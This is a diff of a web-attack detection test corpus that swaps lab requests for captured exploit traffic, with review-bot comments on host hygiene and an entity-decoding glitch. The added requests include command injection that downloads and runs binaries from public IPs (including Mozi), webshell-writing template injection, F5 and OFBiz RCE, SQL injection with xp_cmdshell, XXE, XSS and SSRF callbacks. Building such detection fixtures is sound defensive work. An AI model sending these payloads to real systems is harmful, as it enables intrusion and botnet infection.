b/testcases/c0/89/6cbe70f48c5fd7492607415e1918.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /casmain.xgi HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +Language_S=../../../../windows/win.ini + 
diff --git a/testcases/c2/14/44c7ca191769289924c18167598b.black b/testcases/c2/14/44c7ca191769289924c18167598b.black index c1fe0b150..8c8d39f76 100644 --- a/testcases/c2/14/44c7ca191769289924c18167598b.black +++ b/testcases/c2/14/44c7ca191769289924c18167598b.black @@ -1,10 +1,13 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+pg_sleep%2810%29&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + +&send; + diff --git a/testcases/c7/2a/d05669e002228b0eabd5805187f5.black b/testcases/c7/2a/d05669e002228b0eabd5805187f5.black index 0f7cbd1ce..3b912d002 100644 --- a/testcases/c7/2a/d05669e002228b0eabd5805187f5.black +++ b/testcases/c7/2a/d05669e002228b0eabd5805187f5.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /include/thumb.php?dir=http\..\admin\login\login_check.php HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=%7B%22id%22%3A%22MSBhbmQgMT0y%22%7D&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close 
diff --git a/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black b/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black index 13a1136be..e20089e63 100644 --- a/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black +++ b/testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://47.108.71.52/Linux2.6;chmod%20777%20Linux2.6;./Linux2.6 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28parent%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black b/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black index 9de5a1440..9de28878c 100644 --- a/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black +++ b/testcases/c9/59/ff8a75123ca81c1e02831483bdab.black 
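Review bot: The added request line in testcases/c7/8a/dcf02bbc575d68ce9ddcd72611b2.black embeds a routable public address (`47.108.71.52`) as the download host, so the fixture points at infrastructure the project presumably does not control. If the corpus is replayed against a target that really is vulnerable, or processed by tooling that resolves URLs, that host would be contacted, and a detection rule should not depend on the specific address anyway. I would replace the host with a reserved documentation address such as `192.0.2.1` and leave the rest of the sample unchanged. The same applies to the public addresses in cc/81 and fb/cf and to the `*.xaliyun.com` callback hostnames in d4/93, de/16, f7/13 and fb/cf, where a name under `example.com` would serve.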
@@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /mgmt/tm/util/bash HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cbody+background%3D%22%2F%2Fevil%3F+%3Ctable+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Cthead+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Ctbody+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Ctfoot+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Ctd+background%3D%22%2F%2Fevil%3F+%3Ctable%3E%3Cth+background%3D%22%2F%2Fevil%3F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"command":"run","utilCmdArgs":"-c id"} + diff --git a/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black b/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black index 0dedb686e..d86e41e5f 100644 --- a/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black +++ b/testcases/c9/b7/41d14e7f2e840c72e6b74a2b7f1a.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /index.php/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func&vars%5B0%5D=md5&vars%5B1%5D=20220321 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close 
diff --git a/testcases/cc/81/555e2ac26325cb395cd679e71594.black b/testcases/cc/81/555e2ac26325cb395cd679e71594.black index df428b1e7..a5bab47ac 100644 --- a/testcases/cc/81/555e2ac26325cb395cd679e71594.black +++ b/testcases/cc/81/555e2ac26325cb395cd679e71594.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=./data/connn.php&t2=file_get_contents&t3=http://38.59.110.34:1248/01.txt HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/ce/8e/1107e19a71beb168c4133f415dea.black b/testcases/ce/8e/1107e19a71beb168c4133f415dea.black index 8d9ab29c5..47c99f17f 100644 --- a/testcases/ce/8e/1107e19a71beb168c4133f415dea.black +++ b/testcases/ce/8e/1107e19a71beb168c4133f415dea.black 
@@ -1,10 +1,11 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +POST /admin/?a=doExportPack&c=language_general&n=language HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=s%3A11%3A%22avatar_link%22%3Bs%3A16%3A%22L2V0Yy9wYXNzd2Q%3D%22&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +appno= 1 union SELECT 42894*41146,1&editor=cn&site=web + diff --git a/testcases/d2/85/cf101c15f554a33e1635a814db84.black b/testcases/d2/85/cf101c15f554a33e1635a814db84.black index 836ec98e7..828b6acd2 100644 --- a/testcases/d2/85/cf101c15f554a33e1635a814db84.black +++ b/testcases/d2/85/cf101c15f554a33e1635a814db84.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?id=1%27+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+&rest_route=/h5vp/v1/view/1 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28self%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/d4/93/c08070006641036baa5c38cf3d42.black b/testcases/d4/93/c08070006641036baa5c38cf3d42.black index 001dd5b41..7b1029ace 100644 
--- a/testcases/d4/93/c08070006641036baa5c38cf3d42.black +++ b/testcases/d4/93/c08070006641036baa5c38cf3d42.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?doAs=%60ping%20acs.nhz4e6ts.xaliyun.com%60 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+foo+%5B+%3C%21ENTITY+ext+SYSTEM+%22file%3A%2F%2F%2Fpath%2Fto%2Ffile%22+%3E+%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black b/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black index 1439021c2..7f19f07d9 100644 --- a/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black +++ b/testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%27ale%27%2B%27rt%27%5D%28top%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close 
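Review bot: The new request line in testcases/d5/cd/8b5a4e82f781e18c753abaceb807.black ends its query with `curpath=/¤tsetting.htm=1`, which looks like `&currentsetting.htm=1` after an HTML-entity decode turned `&curren` into `¤`. This may be an artefact of how the diff is displayed, but if the file on disk holds `¤`, the request has lost its separate `currentsetting.htm` parameter and gained a non-ASCII character in the request target, so it no longer represents the traffic it was captured from. I would restore the tail to `&curpath=/&currentsetting.htm=1` and check the other samples imported from the same source for entity damage.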
diff --git a/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black b/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black index 40d644afc..57f6e8512 100644 --- a/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black +++ b/testcases/d6/36/4f7fd442d0ded1ed975c5131a5a7.black @@ -1,4 +1,4 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.) HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 @@ -8,3 +8,5 @@ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +username=root&password=toor&commit=Login + diff --git a/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black b/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black index 29525a257..327066e6f 100644 --- a/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black +++ b/testcases/de/16/8f5208d44b701dd9e7e7b5245d08.black @@ -1,4 +1,4 @@ -GET /dvwa/js/dvwaPage.js HTTP/1.1 +POST /mapptopo HTTP/1.1 Host: 10.10.3.128 Pragma: no-cache Cache-Control: no-cache @@ -9,3 +9,5 @@ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"AppId": "aaaa'|curl acs.azlvnac6.xaliyun.com|'", "Time": "2020/1/1 1:1:1"} + diff --git a/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black b/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black index 4a91f4599..87bba31fd 100644 --- a/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black +++ b/testcases/df/ee/163c88d58870c7ff1e4a5377d17c.black 
@@ -1,10 +1,27 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /webtools/control/SOAPService HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28window%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + + + + + + 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 + + + + + + + + + + diff --git a/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black b/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black index d2660a353..d65d62edf 100644 --- a/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black +++ b/testcases/eb/ce/f6c680a75859b4b51e819652ff23.black 
@@ -1,10 +1,28 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /webtools/control/xmlrpc;/?PASSWORD=s&USERNAME&requirePasswordChange=Y HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27ale%27%2B%27rt%27%5D%28frames%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close + + +RCE + + + + + +RCE + +rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHEAfgAFcQB+AAV0AARodHRwcHh0AAdodHRwOi8veA== + + + + + + + + diff --git a/testcases/ec/98/75af1332f120a05581069320ad6f.black b/testcases/ec/98/75af1332f120a05581069320ad6f.black index 65dd18e4e..ae18aab67 100644 --- a/testcases/ec/98/75af1332f120a05581069320ad6f.black +++ b/testcases/ec/98/75af1332f120a05581069320ad6f.black 
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /abcdefg/hijklmn/a.html?1%20AND%201=1%20UNION%20ALL%20SELECT%201,NULL,%27%27,table_name%20FROM%20information_schema.tables%20WHERE%202>1--/**/;%20EXEC%20xp_cmdshell(%27cat%20../../../etc/passwd%27) HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%7By%3A%27%27.constructor.prototype%7D.y.charAt%3D%5B%5D.join%3B%5B1%5D%7CorderBy%3A%27x%3Dalert%281%29%27 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black b/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black index 8717f6214..9c6af1182 100644 --- a/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black +++ b/testcases/f1/e6/04a2a6bd968eeccacc3492bb9a54.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?nice%20?%3Cscript%3Ealert(11)%3C/script%3E%20%2C%20%20/true=123.txt HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+foo+%5B%3C%21ENTITY+%25+xxe+SYSTEM+%22YOUR-DTD-URL%22%3E+%25xxe%3B%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black b/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black index 41b3c8bd8..5d38d0567 100644 
--- a/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black +++ b/testcases/f3/e3/c018d16aaaaec1aa81063599de7d.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/ HTTP/1.1 +GET /?nice%20?%3Cimg%20src=%22x%22%20onerror=%22document.location=`http://www%E3%80%82baidu%E3%80%82com`%22%3E%20%2C%20%20/true=123.txt HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+message+%5B+%3C%21ENTITY+%25+local_dtd+SYSTEM+%22file%3A%2F%2F%2Fusr%2Fshare%2Fyelp%2Fdtd%2Fdocbookx.dtd%22%3E+%3C%21ENTITY+%25+ISOamso+%27+%3C%21ENTITY+%26%23x25%3B+file+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fhostname%22%3E+%3C%21ENTITY+%26%23x25%3B+eval+%22%3C%21ENTITY+%26%23x26%3B%23x25%3B+error+SYSTEM+%26%23x27%3Bfile%3A%2F%2F%2Fnonexistent%2F%26%23x25%3Bfile%3B%26%23x27%3B%3E%22%3E+%26%23x25%3Beval%3B+%26%23x25%3Berror%3B+%27%3E+%25local_dtd%3B+%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f5/c3/a3430806d58e7326c185844478cb.black b/testcases/f5/c3/a3430806d58e7326c185844478cb.black index 6bbc10d5c..fef60b48d 100644 --- a/testcases/f5/c3/a3430806d58e7326c185844478cb.black +++ b/testcases/f5/c3/a3430806d58e7326c185844478cb.black 
@@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /check/list.json HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=toString.constructor.prototype.toString%3DtoString.constructor.prototype.call%3B%5B%22a%22%2C%22alert%281%29%22%5D.sort%28toString.constructor%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"order":"DESC","orderBy":"boot_time","page":"1","pageSize":20,"state":"extractvalue(1,concat(char(126),version()))"} + diff --git a/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black b/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black index c4166a051..466baebb5 100644 --- a/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black +++ b/testcases/f7/13/972839f8fc8f52d10dccf5810a37.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?doAs=%60ping%20acs.14z6oc22.xaliyun.com%60 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27ale%27%2B%27rt%27%5D%28self%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black b/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black index e64514c78..ff92eb091 100644 
--- a/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black +++ b/testcases/f8/a4/02ab54e5f09988c77ecb2226ca26.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /id/1/text/2%20and%202=2 HTTP/1.0 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=1&Submit=Submit Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black b/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black index 5a7d8dde7..63a16c346 100644 --- a/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black +++ b/testcases/fb/cf/9af1737e5cef4ea8386f6b983812.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /plugins/servlet/gadgets/makeRequest?url=https://47.104.188.110:7888@acs.qcz84ien.xaliyun.com HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28self%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black b/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black index cbf806198..708f2e541 100644 --- a/testcases/fd/1d/a479fb9451e9a1823d4a60822908.black 
